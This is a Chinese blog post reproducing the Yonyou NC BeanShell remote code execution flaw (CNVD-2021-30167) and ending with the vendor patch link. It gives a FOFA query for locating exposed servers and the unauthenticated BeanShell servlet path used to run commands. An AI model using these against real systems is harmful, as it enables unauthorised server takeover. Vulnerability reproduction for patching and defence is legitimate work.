【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

  • A+
所属分类:安全漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

0x01 简介

该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。


0x02 影响版本

NC6.5版本


0x03 漏洞复现

FOFA语句:

icon_hash="1085941792"

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

访问目标站点这个酱紫

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

执行命令

PoC:

/servlet/~ic/bsh.servlet.BshServlet


【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

脚本验证

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

用脚写的太菜就不放出来见笑了【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现


0x04 修复方案

官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。下载链接:http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

往期文章有彩蛋哦【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

本文始发于微信公众号(渗透Xiao白帽):【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: